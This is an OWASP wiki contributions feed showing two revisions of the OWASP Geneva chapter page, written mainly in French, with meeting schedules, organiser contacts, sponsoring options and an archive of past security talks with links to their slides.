https://wiki.owasp.org/api.php?action=feedcontributions&user=Thofer&feedformat=atomOWASP - User contributions [en]2024-03-28T19:02:41ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Geneva&diff=250741Geneva2019-04-28T21:17:22Z<p>Thofer: Add reference and link to calendar</p>
<hr />
<div>__NOTOC__ <br />
<br />
'''If you are looking for information on nationwide OWASP Switzerland chapter activities and meetings held in the German-speaking area, please follow this link to the [https://www.owasp.org/index.php/Switzerland OWASP Switzerland chapter].'''<br />
<br><br><br />
= Bienvenue =<br />
Bienvenue sur la page d'accueil de la section locale OWASP Geneva!<br /><br /><br />
Si vous n'êtes pas encore notifié-e automatiquement de nos activités, nous vous invitons à nous suivre via [https://twitter.com/owasp_geneva twitter], [https://www.linkedin.com/groups/5065030/ linkedin] ou notre [https://groups.google.com/a/owasp.org/forum/#!forum/geneva-chapter groupe de discussion].<br /><br /><br />
Si vous cherchez la page de la section OWASP Suisse: '''[[Switzerland|OWASP Switzerland chapter]]'''<br />
<br />
<br />
= Agenda des meetings =<br />
Les meetings ont lieu sur une base trimestrielle et se déroulent généralement dans une salle mise à disposition par un sponsor ou par l'un des partenaires académiques/institutionnels de la section.<br />
<br />
L'organisation et le détail des meetings sont communiqués via la [https://groups.google.com/a/owasp.org/forum/#!forum/geneva-chapter liste de diffusion] et via le [https://twitter.com/OWASP_Geneva compte Twitter] de la section.<br />
Ils sont également publiés sur [https://calendar.google.com/calendar/embed?src=owasp.org_durrij6j25be74fb82ls9868lk%40group.calendar.google.com&ctz=Europe%2FZurich le calendrier] de la section.<br />
<br />
'''PROCHAIN MEETING : mardi 4 juin 2019'''<br><br />
Lieu: Genève (centre-ville)<br /><br />
Thème: à venir<br /><br />
Inscription: à venir<br /><br />
<br />
Facility sponsor:<br /><br />
[https://www.sonarsource.com/?utm_source=owasp.org&utm_campaign=owaspgva https://www.owasp.org/images/4/4f/SonarSource_72_px.png]<br><br />
<br />
<br />
= Newsletter & contact =<br />
* Via [mailto:antonio.fontes@owasp.org,jeremy.matos@owasp.org,thomas.hofer@owasp.org email]<br /><br />
* Via [https://groups.google.com/a/owasp.org/forum/#!forum/geneva-chapter le groupe de discussion]<br /><br />
* Via [https://twitter.com/OWASP_Geneva Twitter (@OWASP_Geneva)]<br /><br />
* Via [https://www.linkedin.com/groups/5065030/ LinkedIn]<br />
<br />
<br />
= Participation =<br />
Les meetings OWASP sont ouverts à tous et gratuits. Nous encourageons l'échange informel sur tous sujets relatifs à la sécurité applicative. Toute personne intéressée par la sécurité applicative est la bienvenue aux meetings!<br />
<br />
<br> Les sujets principalement abordés sont:<br />
<br />
*Analyse et conception d'applications sécurisées<br />
*Techniques et méthodes de développement sécurisé<br />
*Évaluation et validation de la sécurité des applications (tests d'intrusion, recherche de vulnérabilités)<br />
*Sécurité d'architectures et technologies de développement logiciel<br />
*Gouvernance de la sécurité logicielle dans les organisations<br />
<br><br />
<br />
'''Vous souhaitez présenter lors d'un meeting?'''<br><br />
Si vous souhaitez présenter un sujet lors d'un prochain meeting OWASP ou avez une question relative aux meetings de la section OWASP Geneva, n'hésitez pas à envoyer un email au [mailto:geneva@owasp.ch comité]. Toute intervention orale (présentation, formation) lors d'un meeting OWASP est soumise à l'acceptation préalable du [https://www.owasp.org/index.php/Speaker_Agreement règlement des conférenciers].<br />
<br><br />
<br />
= Sponsoring =<br />
Quatre formules de sponsoring sont actuellement proposées aux organisations désireuses de soutenir la mission de l'OWASP:<br />
* Chapter Supporter: soutien significatif annuel de la section OWASP Geneva (p.ex.: financement, mise à disposition d'une salle, outils, etc.)<br />
* Single Meeting Supporter: soutien financier ou logistique ponctuel à l'occasion d'un meeting de la section OWASP Geneva <br />
* Facility Sponsor: mise à disposition d'une salle équipée pour la tenue des meetings OWASP Geneva<br />
* OWASP Supporter: soutien financier annuel de la fondation OWASP + 40% de la cotisation reversés à la section affiliée (OWASP Geneva)<br />
<br />
Pour toute information relative au sponsoring affilié à la section, merci de contacter le [mailto:geneva@owasp.ch Comité] ou consulter la page [https://www.owasp.org/index.php/Membership memberships] dédiée à cet effet.<br />
<br><br />
<br />
= Organigramme =<br />
L'organisation, les activités et les décisions de la Section OWASP Geneva sont pilotées par son Comité (OWASP Geneva Chapter Board). Le Comité est composé des trois ''Chapter Leaders'' suivants:<br />
* [mailto:antonio.fontes@owasp.org Antonio Fontes]<br />
* [mailto:thomas.hofer@owasp.org Thomas Hofer] <br />
* [mailto:jeremy.matos@owasp.org Jérémy Matos] <br />
* Vous pouvez [mailto:antonio.fontes@owasp.org,jeremy.matos@owasp.org,thomas.hofer@owasp.org cliquer ici] pour joindre le Comité d'un seul clic.<br />
<br><br />
<br />
= Historique =<br />
'''Mardi 12 mars 2019 / Tuesday 13th March 2019''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève/Geneva<br /><br />
Conférence/Talk #1: Jean Lejeune - "Docker security for devs" ([https://www.owasp.org/images/8/8f/20190312_-_OWASP_Geneva_Chapter_-_Docker_security.pdf slides])<br /><br />
<br />
'''Mardi 11 décembre 2018 / Tuesday December 11th 2018''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Jérémy Matos - "Une gestion plus sécurisée des dépendances front-end" (''Towards a more secure management of third-party dependencies'') ([https://www.owasp.org/images/d/d4/OWASP_gestion_dependances_frontend.pdf slides])<br /><br />
<br />
'''Lundi 11 septembre 2017 / Monday September 11th 2017''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Christian Folini - "OWASP ModSecurity Core Ruleset version 3" (slides en attente)<br /><br />
<br />
'''Lundi 24 avril 2017 / Monday April 24th 2017''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Julien Bachmann - "Retour sur une décennie de tests d'intrusion: comment améliorer la détection?" ([https://www.owasp.org/images/d/d6/Owasp2017_jbachmann.pdf slides])<br /><br />
Conference/Talk 2: Thomas Hofer - " Le vote électronique à Genève: dernières évolutions" ([https://www.owasp.org/images/7/75/CHvote_%E2%80%93_towards_2.0.pdf slides])<br /><br />
<br />
'''Lundi 12 décembre 2016 / Monday December 12th 2016''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Jérémy Matos - "OWASP Mobile Application Security Verification Standard (MASVS)" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Jeremy_Matos-MASVS.pdf slides])<br /><br />
Conference/Talk 2: Cédric Jeanneret - "Compromission d'un serveur web: le point de vue du sysadmin" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Cedric_Jeanneret-Serveurs_web_vu_du_sysadmin.pdf slides (Latex export)] [https://github.com/EthACKdotOrg/Presentations/tree/master/20161212 source] )<br /><br />
<br />
<br />
'''Lundi 16 novembre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Julien Bachmann - "Elasticsearch: incident detection use-cases and security best practices" ([https://speakerdeck.com/milkmix/elasticsearch-incident-detection-use-cases-and-security-best-practices slides])<br /><br />
<br />
<br />
'''Lundi 19 octobre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Flash talk: Antonio Fontes - "OWASP Software Assurance Maturity Model" ([https://www.owasp.org/images/5/51/OWASP_Geneva-20151019-Antonio_Fontes-SAMM.pdf slides])<br /><br />
Flash talk: Thomas Hofer - "OWASP Dependency Check" ([https://www.owasp.org/images/9/92/OWASP_Geneva-20151019-Thomas_Hofer-Dependency_Check.pdf slides])<br /><br />
Flash talk: Antonio Fontes - "OWASP Application Security Verification Standard" ([https://www.owasp.org/images/0/02/OWASP_Geneva-20151019-Antonio_Fontes-ASVS.pdf slides])<br /><br />
([https://www.owasp.org/images/c/cc/OWASP_Geneva-20151019-Meeting_Slides_Deck.zip powerpoint decks archive])<br /><br />
<br />
<br />
'''Lundi 2 mars 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Alain Sullam - "Analyse de code malveillant avec Cuckoo sandbox" ([https://www.owasp.org/index.php/File:OWASP_Geneva-2015_03_02-Alain_Sullam-CUCKOO.pdf slides])<br /><br />
<br />
'''Lundi 19 janvier 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Thème: soirée bar-talk / actualité et débats appsec <br /><br />
<br />
'''Lundi 15 décembre 2014''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Stéphane Adamiste - "Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets" ([https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx slides])<br /><br />
<br />
'''Mercredi 25 juin 2013''' | OWASP European Chapters Tour 2013<br /><br />
Lieu: Genève<br /><br />
Conférence: Sebastien Deleersnyder - "Open SAMM"([https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx slides])<br /><br />
<br />
'''Mardi 7 Mai 2013''' | Local Chapter meeting<br><br />
Lieu: Genève<br /><br />
Conférence: Simon Blanchet - "Gouvernance de la sécurité logicielle, le modèle BSIMM 4"([https://owasp.org/images/e/e7/OWASP_Geneva-2013_05_07-Simon_Blanchet-BSIMM4.pptx slides])<br /><br />
<br />
'''5 et 6 décembre 2012''' | Local Chapter Meeting<br><br />
Lieux: Genève (6 décembre), Yverdon-les-Bains (5 décembre)<br><br />
[http://lists.owasp.org/pipermail/owasp-geneva/2012-November/000039.html informations] | [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf slides]<br />
<br />
'''13. December 2011''' | Local Chapter Meeting<br> All information about the meeting can be found [https://lists.owasp.org/pipermail/owasp-switzerland/2011-December/000223.html here]<br />
<br />
'''13. Mai 2011''' | Swiss Cyber Storm III<br><br />
Les sections OWASP Suisse et Genève présenteront l'OWASP lors du SCS3. <br />
<br />
'''17. Février 2011''' | Local ChaptervMeeting<br><br />
Lieu: Yverdon-Les-Bains. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''23. Mars 2010''' | Local ChaptervMeeting<br><br />
Lieu: Application Security Forum, à Genève. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''22. Janvier 2010''' | Challenge Insomni'hack<br><br />
La section OWASP Geneva tiendra un desk d'informations lors du prochain challenge Insomni'hack 2010'''. N'hésitez pas à venir nous rendre visite et découvrir les activités et projets de l'OWASP! [http://www.scrt.ch/pages/concours10.html informations]'''<br />
<br />
'''25. Avril 2009 | Local Chapter Meeting'''<br /><br />
Résultats des sondages: [http://www.surveymonkey.com/s.aspx?sm=4Uj8sRJAAWEhZStomAIUfg_3d_3d survey]<br><br />
Slides de présentations: [[Geneva_Spring_2009_Meeting|Geneva Spring 09 meeting]].<br><br />
<br><br />
<br />
<br />
= Supports = <br />
<br />
'''Mars/March 2019 - Local Chapter meeting'''<br />
* J. Lejeune - [https://www.owasp.org/images/8/8f/20190312_-_OWASP_Geneva_Chapter_-_Docker_security.pdf Docker security for devs]<br />
<br />
'''Décembre 2018 - Local Chapter meeting'''<br />
* J. Matos - [https://www.owasp.org/images/d/d4/OWASP_gestion_dependances_frontend.pdf Towards a more secure management of third-party dependencies]<br />
<br />
'''Septembre 2017 - Local Chapter meeting'''<br />
* C. Folini - OWASP ModSecurity Core Ruleset version 3<br />
<br />
'''Avril 2017 - Local Chapter meeting<br />'''<br />
* J. Bachmann - [https://www.owasp.org/images/d/d6/Owasp2017_jbachmann.pdf A feedback on 10 years of pentesting and DFIR]<br />
* T. Hofer - [https://www.owasp.org/images/7/75/CHvote_%E2%80%93_towards_2.0.pdf Evolutions in the e-voting system of Canton Geneva]<br />
<br />
'''Décembre 2016 - Local Chapter meeting'''<br />
* J. Matos - [https://www.owasp.org/images/f/fe/OWASP_Geneva-Chapter_Meeting-20161212_Jeremy_Matos-MASVS.pdf OWASP Mobile Application Security Verification Standard (MASVS)]<br />
* C. Jeanneret - [https://www.owasp.org/images/3/35/OWASP_Geneva-Chapter_Meeting-20161212_Cedric_Jeanneret-Serveurs_web_vu_du_sysadmin.pdf La sécurité web vue du sysadmin] - [https://github.com/EthACKdotOrg/Presentations/tree/master/20161212 source] )<br />
<br />
'''Novembre 2015 - Local Chapter meeting'''<br />
* J. Bachmann - [https://speakerd.s3.amazonaws.com/presentations/c5787693d0d0428e8a9e13f54dbc32f5/elasticsearch_use-cases_security.pdf Elasticsearch: incident detection use cases and security best practices]<br />
<br />
'''Octobre 2015 - Local Chapter meeting'''<br />
* A. Fontes - [https://www.owasp.org/images/5/51/OWASP_Geneva-20151019-Antonio_Fontes-SAMM.pdf OWASP Software Assurance Maturity Model]<br />
* T. Hofer - [https://www.owasp.org/images/9/92/OWASP_Geneva-20151019-Thomas_Hofer-Dependency_Check.pdf slides OWASP Dependency Check]<br />
* A. Fontes - [https://www.owasp.org/images/0/02/OWASP_Geneva-20151019-Antonio_Fontes-ASVS.pdf OWASP Application Security Verification Standard]<br />
* [https://www.owasp.org/images/c/cc/OWASP_Geneva-20151019-Meeting_Slides_Deck.zip powerpoint decks slide bundle]<br />
<br />
'''Mars 2015 - Local Chapter meeting'''<br />
* A. Sullam - [https://www.owasp.org/index.php/File:OWASP_Geneva-2015_03_02-Alain_Sullam-CUCKOO.pdf Analyse de code malveillant avec Cuckoo sandbox]<br />
<br />
'''Décembre 2014 - Local Chapter meeting'''<br />
* S. Adamiste - [https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets]<br />
<br />
'''Juin 2013 - OWASP Meeting - Europe Chapters Tour'''<br />
* S. Deleersnyder - [https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx OWASSP OpenSAMM]<br />
<br />
'''Décembre 2012 - OWASP Meeting Genève et Yverdon-les-Bains'''<br />
* S. Maret - [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf Services web SOAP et REST: quelles opportunités pour la sécurité?]<br />
<br />
'''Mai 2011 - Swiss Cyber Storm (Rapperswil)'''<br />
* A. Fontes - [https://www.owasp.org/index.php/File:SwissCyberStorm3-Do_you_know_OWASP.pdf About the OWASP].<br />
<br />
'''Février 2011 meeting (Feb 11th. 2011, Yverdon-les-Bains)'''<br />
* A. Fontes - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-keynote.pptx Keynote] (in French)<br />
* S. Andrivet/F.Bottaccio - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-0days.pptx 0-days: le diable se cache dans les plug-ins] (in French)<br />
* T. Hofer - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-TrouvezVosBugsLePremier.pptx Code source - Soyez le premier à trouver vos failles de sécurité!] (in French)<br />
<br />
'''Spring 2010 meeting (March 4th. 2010, Geneva)'''<br />
* A. Fontes - Keynote ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* S. Maret - Integrating strong authentication in web applications (in French) ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* P. Leothaud - Security considerations on strong authentication: analysis of the ASVS (in French) ([http://www.scribd.com/doc/28230739/Geneva-Application-Security-Forum online])<br />
* R. Ott - Digital identities federation and OpenID (in English) ([http://www.scribd.com/doc/28229887/Geneva-Application-Security-Forum-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
<br />
'''Spring 2009 meeting (April 23rd. 2009, Geneva)'''<br />
* A. Fontes - Introduction and keynote ([http://www.owasp.org/images/3/38/0_OWASP-geneva-Spring-09-FONTES.pptx Office 2007], [http://www.owasp.org/images/8/8b/0_OWASP-geneva-Spring-09-FONTES.ppt Office 2003], [http://www.owasp.org/index.php/Image:0_OWASP-geneva-Spring-09-FONTES.pdf PDF]) (in French)<br />
* S. Gioria - The OWASP Top 10 ([http://www.owasp.org/images/d/de/1_OWASP-geneva-Spring-09-GIORIA.ppt Office 2003], [http://www.owasp.org/index.php/Image:1_OWASP-geneva-Spring-09-GIORIA.pdf PDF]) (in French)<br />
* G.K. Agopome - Merging security into the SDLC: from theory to practice ([http://www.owasp.org/images/d/da/2_OWASP-geneva-Spring-09-AGOPOME.ppt Office 2003], [http://www.owasp.org/index.php/Image:2_OWASP-geneva-Spring-09-AGOPOME.pdf PDF]) (in French)<br />
<headertabs></headertabs><br />
<br />
{| cellspacing="15"<br />
|-<br />
| [[Image:Mailinglist_button.png|62px|link=https://groups.google.com/a/owasp.org/forum/#!forum/geneva-chapter]] <br />
| [[Image:Twitter_button.png|62px|link=https://twitter.com/OWASP_Geneva]]<br />
|}<br />
<br />
[[Category:OWASP_Chapter]] <br />
[[Category:Switzerland]] <br />
[[Category:Europe]]</div>Thoferhttps://wiki.owasp.org/index.php?title=Geneva&diff=229136Geneva2017-04-25T10:19:39Z<p>Thofer: Fixed meeting date (need more sleep)</p>
<hr />
<div>__NOTOC__ <br />
<br />
'''If you are looking for information on nationwide OWASP Switzerland chapter activities and meetings held in the German-speaking area, please follow this link to the [https://www.owasp.org/index.php/Switzerland OWASP Switzerland chapter].'''<br />
<br><br><br />
= Bienvenue =<br />
[[File:Owasp_switzerland_geneva_logo.png|150px|right|OWASP Switzerland Chapter Logo]]<br />
<br />
Bienvenue sur la page d'accueil de la section locale OWASP Geneva!<br />
* Pour vous inscrire à la liste de diffusion: [http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva mailing list]<br />
* Pour nous suivre sur Twitter: [https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<!--* Pour consulter le programme du prochain meeting (25 juin 2013) et vous inscrire: [http://owaspeutourgeneva.eventbrite.com owaspeutourgeneva.eventbrite.com]--><br />
<br />
<br> Pour consulter le site de la section nationale: '''[[Switzerland|OWASP Switzerland chapter]]'''<br />
<br><br />
<br><br />
<br />
= Agenda des meetings =<br />
Les meetings ont lieu sur une base trimestrielle et se déroulent généralement dans une salle mise à disposition par un sponsor ou par l'un des partenaires académiques/institutionnels de la section. Dès décembre 2012, les meetings se tiennent en itinérance dans deux villes de Suisse romande. L'organisation et le détail des meetings est communiqué via la [http://lists.owasp.org/mailman/listinfo/owasp-geneva liste de diffusion] et via le [https://twitter.com/OWASP_Geneva compte Twitter de la section].<br />
<br />
'''PROCHAIN MEETING : 7 Avril 2017'''<br><br />
Lieu: Genève -<br /><br />
Inscription: lien publié prochainement (s'inscrire à la liste de diffusion ou au flux Twitter)<br /><br />
Sponsors/Remerciements: -<br /><br />
Thème: -<br /><br />
<br><br />
<br />
= Newsletter et contact =<br />
Par email:<br>[mailto:antonio.fontes@owasp.org OWASP Geneva]<br><br><br />
Par la liste de diffusion:<br>[http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva Mailing List]<br><br><br />
Par Twitter:<br>[https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<br><br />
<br />
<br />
= Participation =<br />
Les meetings OWASP sont ouverts à tous et gratuits. Nous encourageons l'échange informel sur tous sujets relatifs à la sécurité applicative. Toute personne intéressée par la sécurité applicative est la bienvenue aux meetings!<br />
<br />
<br> Les sujets principalement abordés sont:<br />
<br />
*Analyse et conception d'applications sécurisées<br />
*Techniques et méthodes de développement sécurisé<br />
*Évaluation et validation de la sécurité des applications (tests d'intrusion, recherche de vulnérabilités)<br />
*Sécurité d'architectures et technologies de développement logiciel<br />
*Gouvernance de la sécurité logicielle dans les organisations<br />
<br><br />
<br />
'''Vous souhaitez présenter lors d'un meeting?'''<br><br />
Si vous souhaitez présenter un sujet lors d'un prochain meeting OWASP ou avez une question relative aux meetings de la section OWASP Geneva, n'hésitez pas à envoyer un email au [mailto:geneva@owasp.ch comité]. Toute intervention orale (présentation, formation) lors d'un meeting OWASP est soumise à l'acceptation préalable du [https://www.owasp.org/index.php/Speaker_Agreement règlement des conférenciers].<br />
<br><br />
<br />
= Sponsoring =<br />
Quatre formules de sponsoring sont actuellement proposées aux organisations désireuses de soutenir la mission de l'OWASP:<br />
* Chapter Supporter: soutien financier annuel de la section OWASP Geneva<br />
* Single Meeting Supporter: soutien financier ponctuel, pour un meeting spécifique de la section OWASP Geneva <br />
* Facility Sponsor: mise à disposition de salles équipées pour la tenue des meetings OWASP Geneva<br />
* Organization Supporter: soutien financier annuel de la fondation OWASP + 40% de la cotisation reversés à la section affiliée (OWASP Geneva)<br />
<br />
Pour toute information relative au sponsoring affilié à la section, merci de contacter le [mailto:geneva@owasp.ch Comité] ou consulter la page [https://www.owasp.org/index.php/Membership memberships] dédiée à cet effet.<br />
<br><br />
<br />
= Organigramme =<br />
La Section OWASP Geneva est organisée sous la forme d'un Comité (OWASP Geneva Chapter Board) en charge de la gestion de la section et de ses activités. Le Comité est composé de:<br />
* [mailto:antonio.fontes@owasp.org Antonio Fontes] (''chapter leader'')<br />
* [mailto:thomas.hofer@owasp.org Thomas Hofer] (''board member'')<br />
* Vous pouvez [mailto:geneva@owasp.ch cliquer ici] pour joindre le Comité via une seule adresse <br />
<br><br />
<br />
= Historique =<br />
'''Lundi 24 avril 2017 / Monday April 24th 2017''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Julien Bachmann - "Retour sur une décennie de tests d'intrusion: comment améliorer la détection?"<br /><br />
Conference/Talk 2: Thomas Hofer - " Le vote électronique à Genève: dernières évolutions" ([https://www.owasp.org/images/7/75/CHvote_%E2%80%93_towards_2.0.pdf slides])<br /><br />
<br />
'''Lundi 12 décembre 2016 / Monday December 12th 2016''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Jérémy Matos - "OWASP Mobile Application Security Verification Standard (MASVS)" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Jeremy_Matos-MASVS.pdf slides])<br /><br />
Conference/Talk 2: Cédric Jeanneret - "Compromission d'un serveur web: le point de vue du sysadmin" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Cedric_Jeanneret-Serveurs_web_vu_du_sysadmin.pdf slides (Latex export)] [https://github.com/EthACKdotOrg/Presentations/tree/master/20161212 source] )<br /><br />
<br />
<br />
'''Lundi 16 novembre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Julien Bachmann - "Elasticsearch: incident detection use-cases and security best practices" ([https://speakerdeck.com/milkmix/elasticsearch-incident-detection-use-cases-and-security-best-practices slides])<br /><br />
<br />
<br />
'''Lundi 19 octobre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Flash talk: Antonio Fontes - "OWASP Software Assurance Maturity Model" ([https://www.owasp.org/images/5/51/OWASP_Geneva-20151019-Antonio_Fontes-SAMM.pdf slides])<br /><br />
Flash talk: Thomas Hofer - "OWASP Dependency Check" ([https://www.owasp.org/images/9/92/OWASP_Geneva-20151019-Thomas_Hofer-Dependency_Check.pdf slides])<br /><br />
Flash talk: Antonio Fontes - "OWASP Application Security Verification Standard" ([https://www.owasp.org/images/0/02/OWASP_Geneva-20151019-Antonio_Fontes-ASVS.pdf slides])<br /><br />
([https://www.owasp.org/images/c/cc/OWASP_Geneva-20151019-Meeting_Slides_Deck.zip powerpoint decks archive])<br /><br />
<br />
<br />
'''Lundi 2 mars 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Alain Sullam - "Analyse de code malveillant avec Cuckoo sandbox" ([https://www.owasp.org/index.php/File:OWASP_Geneva-2015_03_02-Alain_Sullam-CUCKOO.pdf slides])<br /><br />
<br />
'''Lundi 19 janvier 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Thème: soirée bar-talk / actualité et débats appsec <br /><br />
<br />
'''Lundi 15 décembre 2014''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Stéphane Adamiste - "Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets" ([https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx slides])<br /><br />
<br />
'''Mercredi 25 juin 2013''' | OWASP European Chapters Tour 2013<br /><br />
Lieu: Genève<br /><br />
Conférence: Sebastien Deleersnyder - "Open SAMM"([https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx slides])<br /><br />
<br />
'''Mardi 7 Mai 2013''' | Local Chapter meeting<br><br />
Lieu: Genève<br /><br />
Conférence: Simon Blanchet - "Gouvernance de la sécurité logicielle, le modèle BSIMM 4"([https://owasp.org/images/e/e7/OWASP_Geneva-2013_05_07-Simon_Blanchet-BSIMM4.pptx slides])<br /><br />
<br />
'''5 et 6 décembre 2012''' | Local Chapter Meeting<br><br />
Lieux: Genève (6 décembre), Yverdon-les-Bains (5 décembre)<br><br />
[http://lists.owasp.org/pipermail/owasp-geneva/2012-November/000039.html informations] | [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf slides]<br />
<br />
'''13. December 2011''' | Local Chapter Meeting<br> All information about the meeting can be found [https://lists.owasp.org/pipermail/owasp-switzerland/2011-December/000223.html here]<br />
<br />
'''13. Mai 2011''' | Swiss Cyber Storm III<br><br />
Les sections OWASP Suisse et Genève présenteront l'OWASP lors du SCS3. <br />
<br />
'''17. Février 2011''' | Local ChaptervMeeting<br><br />
Lieu: Yverdon-Les-Bains. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''23. Mars 2010''' | Local ChaptervMeeting<br><br />
Lieu: Application Security Forum, à Genève. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''22. Janvier 2010''' | Challenge Insomni'hack<br><br />
La section OWASP Geneva tiendra un desk d'informations lors du prochain challenge Insomni'hack 2010'''. N'hésitez pas à venir nous rendre visite et découvrir les activités et projets de l'OWASP! [http://www.scrt.ch/pages/concours10.html informations]'''<br />
<br />
'''25. Avril 2009 | Local Chapter Meeting'''<br /><br />
Résultats des sondages: [http://www.surveymonkey.com/s.aspx?sm=4Uj8sRJAAWEhZStomAIUfg_3d_3d survey]<br><br />
Slides de présentations: [[Geneva_Spring_2009_Meeting|Geneva Spring 09 meeting]].<br><br />
<br />
<br><br />
<br />
= Supports = <br />
'''Juin 2013 - OWASP Meeting - Europe Chapters Tour'''<br />
* S. Deleersnyder - [https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx OWASSP OpenSAMM]<br />
<br />
'''Décembre 2012 - OWASP Meeting Genève et Yverdon-les-Bains'''<br />
* S. Maret - [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf Services web SOAP et REST: quelles opportunités pour la sécurité?]<br />
<br />
'''Mai 2011 - Swiss Cyber Storm (Rapperswil)'''<br />
* A. Fontes - [https://www.owasp.org/index.php/File:SwissCyberStorm3-Do_you_know_OWASP.pdf About the OWASP].<br />
<br />
'''Février 2011 meeting (Feb 11th. 2011, Yverdon-les-Bains)'''<br />
* A. Fontes - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-keynote.pptx Keynote] (in French)<br />
* S. Andrivet/F.Bottaccio - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-0days.pptx 0-days: le diable se cache dans les plug-ins] (in French)<br />
* T. Hofer - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-TrouvezVosBugsLePremier.pptx Code source - Soyez le premier à trouver vos failles de sécurité!] (in French)<br />
<br />
'''Spring 2010 meeting (March 4th. 2010, Geneva)'''<br />
* A. Fontes - Keynote ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* S. Maret - Integrating strong authentication in web applications (in French) ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* P. Leothaud - Security considerations on strong authentication: analysis of the ASVS (in French) ([http://www.scribd.com/doc/28230739/Geneva-Application-Security-Forum online])<br />
* R. Ott - Digital identities federation and OpenID (in English) ([http://www.scribd.com/doc/28229887/Geneva-Application-Security-Forum-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
<br />
'''Spring 2009 meeting (April 23rd. 2009, Geneva)'''<br />
